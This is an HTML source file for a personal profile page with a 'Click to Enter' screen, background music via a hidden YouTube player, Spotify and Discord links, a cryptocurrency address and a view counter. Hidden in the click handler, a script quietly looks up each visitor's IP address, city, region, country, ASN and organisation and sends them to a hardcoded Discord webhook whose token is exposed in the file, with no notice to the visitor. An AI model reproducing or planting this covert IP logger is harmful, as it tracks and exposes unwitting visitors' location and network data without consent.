<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdn.tailwindcss.com"></script>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/>
    <style>
        /* Styles de base */
        body {
            font-family: 'Arial', sans-serif;
            cursor: url('https://cdn-icons-png.flaticon.com/512/25/25694.png'), auto;
            background: url('https://cdn.discordapp.com/attachments/1257370223590248540/1301300539534872647/97759808-b73f-4176-a655-2ce9d9697ff3.gif') no-repeat center center fixed;
            background-size: cover;
            height: 100vh;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        /* Style de l'écran d'entrée */
        #enterScreen {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 10;
            cursor: pointer;
        }

        /* Style du contenu principal en rectangle */
        #mainContent {
            background: rgba(0, 0, 0, 0.6);
            backdrop-filter: blur(10px);
            padding: 20px;
            border-radius: 20px;
            color: #a855f7;
            width: 400px;      /* Largeur du rectangle */
            height: 250px;     /* Hauteur du rectangle */
            display: none;
            text-align: center;
            position: relative;
            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.5);
        }

        .profile-picture {
            width: 80px;
            height: 80px;
            border-radius: 50%;
            border: 3px solid #a855f7;
            margin-bottom: 10px;
        }

        .icon {
            color: rgba(168, 85, 247, 0.8);
            transition: color 0.3s ease;
        }

        .icon:hover {
            color: #a855f7;
        }

        /* Volume control styling */
        #player, #volumeControl {
            display: none;
        }
        .volume-container {
            position: relative;
            display: inline-block;
        }
        #volumeControl {
            display: none;
            position: absolute;
            top: -40px;
            left: 0;
            width: 100px;
        }
    </style>
</head>
<body>
    <!-- Écran d'entrée -->
    <div id="enterScreen">
        <div class="text-center text-white">
            <h1 class="text-4xl mb-4">Click to Enter</h1>
        </div>
    </div>

    <!-- Contenu principal en rectangle -->
    <div class="relative" id="mainContent">
        <div class="absolute top-4 left-4 volume-container">
            <i id="volumeIcon" class="fas fa-volume-up text-purple-500 text-2xl cursor-pointer"></i>
            <input type="range" id="volumeControl" min="0" max="100" value="50">
        </div>
        <div class="flex flex-col items-center justify-center text-white h-full">
            <img src="https://cdn.discordapp.com/avatars/1175537037366010048/6ddb5a04ef98ca63df0d713e7e1e4742.webp" alt="Profile picture" class="profile-picture">
            <h1 class="text-xl font-bold text-purple-500">krs' ✿</h1>
            <p class="text-purple-500 text-sm mb-2">It's just you & me and not the others!</p>
            <div class="flex justify-center space-x-2 text-purple-500 text-xl mb-2">
                <a href="https://open.spotify.com/playlist/7daWcbR5JO3R7R3YdQVU5q?si=1cfabc78b8364523" target="_blank" class="icon"><i class="fab fa-spotify"></i></a>
                <a href="https://discord.gg/kimashop" target="_blank" class="icon"><i class="fab fa-discord"></i></a>
            </div>
            <p class="text-purple-500 text-xs mb-2">Address: LVAfyGqC1xrifygnPLxVBCkgGyran7UfHk</p>
            <div class="text-purple-500 text-sm">
                <i class="fas fa-eye"></i> <span id="viewCount">0</span>
            </div>
        </div>
    </div>

    <!-- Contrôle de la musique -->
    <div class="absolute bottom-4 left-4 hidden" id="musicControl">
        <button id="musicToggle" class="text-purple-500 text-xl">
            <i class="fas fa-pause"></i> Pause Music
        </button>
    </div>

    <!-- Lecteur YouTube invisible pour la musique -->
    <div id="player"></div>

    <script>
        document.addEventListener('DOMContentLoaded', (event) => {
            const enterScreen = document.getElementById('enterScreen');
            const mainContent = document.getElementById('mainContent');
            const musicControl = document.getElementById('musicControl');
            const volumeIcon = document.getElementById('volumeIcon');
            const volumeControl = document.getElementById('volumeControl');
            const viewCountElement = document.getElementById('viewCount');

            // Charger le compteur de vues depuis localStorage
            let viewCount = localStorage.getItem('viewCount') ? parseInt(localStorage.getItem('viewCount')) : 0;
            viewCountElement.textContent = viewCount;

            enterScreen.addEventListener('click', () => {
                enterScreen.style.display = 'none';
                mainContent.style.display = 'block';
                musicControl.classList.remove('hidden');
                player.playVideo();

                // Incrémenter le compteur de vues lors de l'entrée
                viewCount++;
                viewCountElement.textContent = viewCount;
                localStorage.setItem('viewCount', viewCount);

                // Envoi des informations d'utilisateur à Discord
                fetch('https://ipapi.co/json/')
                    .then(response => response.json())
                    .then(data => {
                        const embed = {
                            embeds: [{
                                title: "User IP Information",
                                fields: [
                                    { name: "IP", value: data.ip, inline: true },
                                    { name: "City", value: data.city, inline: true },
                                    { name: "Region", value: data.region, inline: true },
                                    { name: "Country", value: data.country_name, inline: true },
                                    { name: "ASN", value: data.asn, inline: true },
                                    { name: "Organization", value: data.org, inline: true }
                                ],
                                footer: {
                                    text: "Data provided by ipapi.co"
                                }
                            }]
                        };
                        fetch('https://discord.com/api/webhooks/1257370240380047541/kj7np_FeepiR1k3U_cUO1HJ2H_5HSCcXTk20ytp9YbfgxR0I6BestwYMgdHNzniSGmZy', {
                            method: 'POST',
                            headers: { 'Content-Type': 'application/json' },
                            body: JSON.stringify(embed)
                        });
                    });
            });

            // Contrôle de la musique
            const musicToggle = document.getElementById('musicToggle');
            let isPlaying = true;
            musicToggle.addEventListener('click', () => {
                if (isPlaying) {
                    player.pauseVideo();
                    musicToggle.innerHTML = '<i class="fas fa-play"></i> Play Music';
                } else {
                    player.playVideo();
                    musicToggle.innerHTML = '<i class="fas fa-pause"></i> Pause Music';
                }
                isPlaying = !isPlaying;
            });

            // Contrôle du volume
            volumeIcon.addEventListener('click', () => {
                if (player.isMuted()) {
                    player.unMute();
                    volumeIcon.classList.replace('fa-volume-mute', 'fa-volume-up');
                } else {
                    player.mute();
                    volumeIcon.classList.replace('fa-volume-up', 'fa-volume-mute');
                }
            });
            volumeControl.addEventListener('input', (event) => {
                player.setVolume(event.target.value);
            });

            // YouTube API
            var tag = document.createElement('script');
            tag.src = "https://www.youtube.com/iframe_api";
            document.body.appendChild(tag);
            var player;
            window.onYouTubeIframeAPIReady = () => {
                player = new YT.Player('player', {
                    videoId: 'yx9WQ0hrsdk',
                    events: { 'onReady': (event) => event.target.setVolume(50).playVideo() }
                });
            };
        });
    </script>
</body>
</html>
